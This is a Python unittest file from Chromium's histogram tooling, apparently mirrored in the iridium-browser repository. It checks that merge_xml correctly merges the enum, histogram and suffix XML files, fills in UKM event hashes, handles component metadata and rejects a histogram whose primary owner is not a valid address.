] | permissive | iridium-browser/iridium-browser | 71d9c5ff76e014e6900b825f67389ab0ccd01329 | 5ee297f53dc7f8e70183031cff62f37b0f19d25f | refs/heads/master | 2023-08-03T16:44:16.844552 | 2023-07-20T15:17:00 | 2023-07-23T16:09:30 | 220,016,632 | 341 | 40 | BSD-3-Clause | 2021-08-13T13:54:45 | 2019-11-06T14:32:31 | null | UTF-8 | Python | false | false | 7,500 | py | # Copyright 2020 The Chromium Authors
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
import unittest
import xml.dom.minidom
import expand_owners
import histogram_paths
import merge_xml
class MergeXmlTest(unittest.TestCase):
def testMergeFiles(self):
"""Checks that enums.xml and histograms.xml can merge successfully."""
merged = merge_xml.PrettyPrintMergedFiles([
histogram_paths.TEST_ENUMS_XML, histogram_paths.TEST_HISTOGRAMS_XML,
histogram_paths.TEST_SUFFIXES_XML
])
# If ukm.xml is not provided, there is no need to populate the
# UkmEventNameHash enum.
expected_merged_xml = """
<histogram-configuration>
<enums>
<enum name="Enum1">
<int value="0" label="Value0"/>
<int value="1" label="Value1"/>
</enum>
<enum name="TestEnum">
<int value="0" label="Value0"/>
<int value="1" label="Value1"/>
</enum>
<enum name="UkmEventNameHash">
<summary>
Placeholder enum. The values are UKM event name hashes truncated to 31 bits.
This gets populated by the GetEnumsNodes function in merge_xml.py when
producing the merged XML file.
</summary>
</enum>
</enums>
<histograms>
<variants name="TestToken">
<variant name="Variant1" summary="Label1"/>
<variant name="Variant2" summary="Label2"/>
</variants>
<histogram name="Foo.Bar" units="xxxxxxxxxxxxxxxxxxyyyyyyyyyyyyyyyyyyyyyyzzzz"
expires_after="M85">
<owner>person@chromium.org</owner>
<component>Component</component>
<summary>Foo</summary>
</histogram>
<histogram name="Test.EnumHistogram" enum="TestEnum" expires_after="M81">
<obsolete>
Obsolete message
</obsolete>
<owner>uma@chromium.org</owner>
<summary>A enum histogram.</summary>
</histogram>
<histogram name="Test.Histogram" units="microseconds" expires_after="M85">
<obsolete>
Removed 6/2020.
</obsolete>
<owner>person@chromium.org</owner>
<summary>Summary 2</summary>
</histogram>
<histogram name="Test.TokenHistogram{TestToken}" units="microseconds"
expires_after="M85">
<obsolete>
Removed 6/2020.
</obsolete>
<owner>person@chromium.org</owner>
<summary>Summary 2</summary>
<token key="TestToken" variants="TestToken"/>
</histogram>
</histograms>
<histogram_suffixes_list>
<histogram_suffixes name="Test.EnumHistogramSuffixes" separator="."
ordering="prefix,2">
<suffix name="TestEnumSuffix" label="The enum histogram_suffixes"/>
<affected-histogram name="Test.EnumHistogram"/>
</histogram_suffixes>
<histogram_suffixes name="Test.HistogramSuffixes" separator=".">
<suffix name="TestSuffix" label="A histogram_suffixes"/>
<affected-histogram name="Test.Histogram"/>
</histogram_suffixes>
</histogram_suffixes_list>
</histogram-configuration>
"""
self.maxDiff = None
self.assertMultiLineEqual(expected_merged_xml.strip(), merged.strip())
def testMergeFiles_WithXmlEvents(self):
"""Checks that the UkmEventNameHash enum is populated correctly.
If ukm.xml is provided, populate a list of ints to the UkmEventNameHash enum
where each value is a truncated hash of the event name and each label is the
corresponding event name, with obsolete label when applicable.
"""
merged = merge_xml.PrettyPrintMergedFiles(histogram_paths.ALL_TEST_XMLS)
expected_merged_xml = """
<histogram-configuration>
<enums>
<enum name="Enum1">
<int value="0" label="Value0"/>
<int value="1" label="Value1"/>
</enum>
<enum name="TestEnum">
<int value="0" label="Value0"/>
<int value="1" label="Value1"/>
</enum>
<enum name="UkmEventNameHash">
<summary>
Placeholder enum. The values are UKM event name hashes truncated to 31 bits.
This gets populated by the GetEnumsNodes function in merge_xml.py when
producing the merged XML file.
</summary>
<int value="151676257" label="AbusiveExperienceHeuristic.TestEvent1"/>
<int value="898353372"
label="AbusiveExperienceHeuristic.TestEvent2 (Obsolete)"/>
<int value="1052089961" label="Autofill.TestEvent3"/>
<int value="1758741469" label="FullyObsolete.TestEvent4 (Obsolete)"/>
</enum>
</enums>
<histograms>
<variants name="TestToken">
<variant name="Variant1" summary="Label1"/>
<variant name="Variant2" summary="Label2"/>
</variants>
<histogram name="Foo.Bar" units="xxxxxxxxxxxxxxxxxxyyyyyyyyyyyyyyyyyyyyyyzzzz"
expires_after="M85">
<owner>person@chromium.org</owner>
<component>Component</component>
<summary>Foo</summary>
</histogram>
<histogram name="Test.EnumHistogram" enum="TestEnum" expires_after="M81">
<obsolete>
Obsolete message
</obsolete>
<owner>uma@chromium.org</owner>
<summary>A enum histogram.</summary>
</histogram>
<histogram name="Test.Histogram" units="microseconds" expires_after="M85">
<obsolete>
Removed 6/2020.
</obsolete>
<owner>person@chromium.org</owner>
<summary>Summary 2</summary>
</histogram>
<histogram name="Test.TokenHistogram{TestToken}" units="microseconds"
expires_after="M85">
<obsolete>
Removed 6/2020.
</obsolete>
<owner>person@chromium.org</owner>
<summary>Summary 2</summary>
<token key="TestToken" variants="TestToken"/>
</histogram>
</histograms>
<histogram_suffixes_list>
<histogram_suffixes name="Test.EnumHistogramSuffixes" separator="."
ordering="prefix,2">
<suffix name="TestEnumSuffix" label="The enum histogram_suffixes"/>
<affected-histogram name="Test.EnumHistogram"/>
</histogram_suffixes>
<histogram_suffixes name="Test.HistogramSuffixes" separator=".">
<suffix name="TestSuffix" label="A histogram_suffixes"/>
<affected-histogram name="Test.Histogram"/>
</histogram_suffixes>
</histogram_suffixes_list>
</histogram-configuration>
"""
self.maxDiff = None
self.assertMultiLineEqual(expected_merged_xml.strip(), merged.strip())
def testMergeFiles_InvalidPrimaryOwner(self):
histograms_without_valid_first_owner = xml.dom.minidom.parseString("""
<histogram-configuration>
<histograms>
<histogram name="Caffeination" units="mg">
<owner>culprit@evil.com</owner>
<summary>I like coffee.</summary>
</histogram>
</histograms>
</histogram-configuration>
""")
with self.assertRaisesRegex(
expand_owners.Error,
'The histogram Caffeination must have a valid primary owner, i.e. a '
'Googler with an @google.com or @chromium.org email address. Please '
'manually update the histogram with a valid primary owner.'):
merge_xml.MergeTrees([histograms_without_valid_first_owner],
should_expand_owners=True)
def testMergeFiles_WithComponentMetadata(self):
merged = merge_xml.PrettyPrintMergedFiles(
[histogram_paths.TEST_XML_WITH_COMPONENTS_RELATIVE])
expected_merged_xml = """
<histogram-configuration>
<histograms>
<histogram name="Test.Histogram" units="seconds" expires_after="M104">
<owner>person@chromium.org</owner>
<owner>team-alias@chromium.org</owner>
<component>Test>Component</component>
<summary>Summary 2</summary>
</histogram>
<histogram name="Test.Histogram.WithComponent" enum="TestEnum"
expires_after="M104">
<owner>uma@chromium.org</owner>
<owner>team-alias@chromium.org</owner>
<component>First>Component</component>
<component>Test>Component</component>
<summary>A enum histogram.</summary>
</histogram>
</histograms>
<histogram_suffixes_list/>
</histogram-configuration>
"""
self.assertMultiLineEqual(expected_merged_xml.strip(), merged.strip())
if __name__ == '__main__':
unittest.main()
| [
"jengelh@inai.de"
] | jengelh@inai.de |
Subsets and Splits
No community queries yet
The top public SQL queries from the community will appear here once available.